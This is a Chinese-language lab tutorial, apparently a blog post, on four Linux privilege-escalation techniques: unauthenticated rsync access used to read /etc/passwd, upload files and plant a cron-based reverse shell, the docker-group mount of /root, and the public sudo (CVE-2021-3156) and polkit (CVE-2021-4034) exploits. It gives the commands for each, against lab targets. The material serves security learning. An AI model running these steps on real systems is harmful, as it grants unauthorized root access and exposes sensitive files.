目录
[案例一: Linux-Rsync 未授权访问覆盖-本地](#案例一: Linux-Rsync 未授权访问覆盖-本地)
[案例二: Linux-Docker 组用户挂载目录-本地](#案例二: Linux-Docker 组用户挂载目录-本地)
[案例三: Linux-Sudo(CVE-2021-3156)-本地](#案例三: Linux-Sudo(CVE-2021-3156)-本地)
案例四:Linux-Polkit(CVE-2021-4034)-本地
思维导图
![](https://img-blog.csdnimg.cn/direct/27e214352c284218838a31f58134cc76.png)
![](https://img-blog.csdnimg.cn/direct/5368fd75cd0f49f8a6cfc061cc870e40.png)
![](https://img-blog.csdnimg.cn/direct/5104569200354d66ad8704f38940cee1.png)
案例一: Linux-Rsync 未授权访问覆盖-本地
rsync 文件传输协议-linux 端口873
配置不当会造成未授权访问。没有配置ACL或者访问密码,可以读取目标服务器文件
靶场环境:
![](https://img-blog.csdnimg.cn/direct/9caeb6023484480bafbd562c674499b9.png)
访问端口
![](https://img-blog.csdnimg.cn/direct/b7073464b67f45b587384accdda558ca.png)
判断是否有该漏洞的方法:
rsync rsync://123.58.224.8:58515
![](https://img-blog.csdnimg.cn/direct/9686ad6c20fe4d8aa79ee175e1ce9b75.png)
利用读取文件
rsync rsync://123.58.224.8:58515/src
![](https://img-blog.csdnimg.cn/direct/5e22ec92b2ed4f32b05f297ea817a454.png)
![](https://img-blog.csdnimg.cn/direct/3108aad0724b4c0c8bee92cbe85e2570.png)
下载文件 ./ 为当前目录
rsync rsync://123.58.224.8:58515/src/etc/passwd ./
![](https://img-blog.csdnimg.cn/direct/6d764c53e73942dea16d0acae021c569.png)
上传文件
rsync -av passwd rsync://123.58.224.8:58515/src/tmp/passwd
![](https://img-blog.csdnimg.cn/direct/8bdc179bf2e8400b91bc0babd1054e5a.png)
![](https://img-blog.csdnimg.cn/direct/3681cd186be94fa19b9c67cbcd502957.png)
利用他去反弹shell的思路:利用计时任务
这里由于该靶场为在线靶场,有时间限制,且必须利用公网ip反弹shell,这里利用下面的网址,搭建在线靶场:Vulhub - Docker-Compose file for vulnerability environment
首先把计时任务保存到本地
![](https://img-blog.csdnimg.cn/direct/ddfcad9f9cf64cc5b60e09f0a89c8497.png)
查看可利用的文件
![](https://img-blog.csdnimg.cn/direct/04d1d3e5bb5845e68cfd8b762afe02d6.png)
必须加执行权限
![](https://img-blog.csdnimg.cn/direct/3a15a5c3c3b0425fbf2e5b6471329dd8.png)
把脚本进行上传
![](https://img-blog.csdnimg.cn/direct/07bbec5bf66c4640afa37288051a3459.png)
开启监听等待
刚好反弹shell
案例二: Linux-Docker 组用户挂载目录-本地
首先条件:普通用户在docker组,利用docker服务启动镜像挂载目录
从而来访问root目录、etc目录等敏感文件来进行权限提升。
环境搭建
useradd -d /home/test -m test (创建test用户)
passwd test (修改密码)
usermod -G docker test (把test用户加入到docker组当中)
利用命令
docker run -v /root:/mnt -it alpine
docker下载alpine镜像,然后利用-v选项把/root目录挂载到docker里面的/mnt目录,-it进入docker,进去以后他会默认你是root用户,你可以去查看/mnt下里面/root的敏感文件
![](https://img-blog.csdnimg.cn/direct/d3c5447759ef4e3c81e348af37e3c7b5.png)
这里我提权拉取了一次所以没有下载过程
![](https://img-blog.csdnimg.cn/direct/d30774a56aef4d31bb5104a962ebda1f.png)
root目录直接挂载到了/mnt目录下获得了敏感信息的窃取
![](https://img-blog.csdnimg.cn/direct/14f91325d72c4f43b14c129b6f50eac7.png)
不仅可以调用/root,也可以调用其他目录,因为docker命令需要执行下载,等等操作,在这个过程当中本身就是root权限,所以所有目录都可以
![](https://img-blog.csdnimg.cn/direct/7a39c4e430cd4965a0c5adc267dce249.png)
案例三: Linux-Sudo(CVE-2021-3156)-本地
影响版本
sudo: 1.8.2 - 1.8.31p2
sudo: 1.9.0 - 1.9.5p1
这台机器正好符合
![](https://img-blog.csdnimg.cn/direct/aa5565949ab2423bb9938414afb034c4.png)
或者利用 sudoedit -s / 去查看如果有报错那证明有漏洞,没报错证明没有
有漏洞的报错
![](https://img-blog.csdnimg.cn/direct/8f9de282b48046a8a9ecead32aa43019.png)
没有漏洞的报错
![](https://img-blog.csdnimg.cn/direct/702712360bca423388164e072a1cc2c8.png)
可能用到的代码
git clone https://github.com/blasty/CVE-2021-3156.git #下载
cd CVE-2021-3156
make #编译
chmod a+x sudo-hax-me-a-sandwich #加执行权限
./sudo-hax-me-a-sandwich 1 #后面的数字1是选择模式
执行效果
![](https://img-blog.csdnimg.cn/direct/a518ce6f06f0422cb80a32ec8861c422.png)
案例四:Linux-Polkit(CVE-2021-4034)-本地
漏洞影响2009年5月至今的所有polkit版本
由于polkit是系统预装工具,所有存在polkit的linux系统均受影响
如:CentOS、Ubuntu、Debian、Redhat、Fedora、Gentoo、Mageia等
判断
dpkg -l policykit-1
如果是这种信息的话那证明可能可以利用
![](https://img-blog.csdnimg.cn/direct/764a08a9edd44decb2e6f607075f358a.png)
git clone https://github.com/berdav/CVE-2021-4034.git
cd CVE-2021-4034/
make
./cve-2021-4034